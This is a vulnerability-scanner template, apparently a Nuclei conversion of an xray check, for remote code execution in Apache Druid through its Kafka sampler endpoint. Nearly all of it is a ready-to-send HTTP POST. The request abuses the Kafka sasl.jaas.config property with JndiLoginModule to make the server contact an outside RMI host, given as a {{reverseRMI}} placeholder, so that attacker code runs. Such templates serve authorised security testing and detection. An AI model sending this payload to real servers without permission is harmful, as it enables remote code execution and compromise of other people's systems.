id: poc-yaml-apache-druid-kafka-rce

info:
  name: poc-yaml-apache-druid-kafka-rce
  author: chaitin
  severity: medium
  tags: xray-converted,rce

http:
  - raw:
      - |
        POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
        "type":"kafka",
        "spec":{
        "type":"kafka",
        "ioConfig":{
        "type":"kafka",
        "consumerProperties":{
        "bootstrap.servers":"6.6.6.6:9092",
        "sasl.mechanism":"SCRAM-SHA-256",
        "security.protocol":"SASL_SSL",
        "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"{{reverseRMI}}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
        },
        "topic":"any",
        "useEarliestOffset":true,
        "inputFormat":{
        "type":"regex",
        "pattern":"([\\s\\S]*)",
        "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
        "columns":[
        "raw"
        ]
        }
        },
        "dataSchema":{
        "dataSource":"sample",
        "timestampSpec":{
        "column":"!!!_no_such_column_!!!",
        "missingValue":"1970-01-01T00:00:00Z"
        },
        "dimensionsSpec":{
        
        },
        "granularitySpec":{
        "rollup":false
        }
        },
        "tuningConfig":{
        "type":"kafka"
        }
        },
        "samplerConfig":{
        "numRows":500,
        "timeoutMs":15000
        }
        }

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200